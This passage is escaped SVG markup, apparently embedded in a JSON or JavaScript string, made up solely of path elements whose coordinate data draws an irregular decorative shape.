d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path 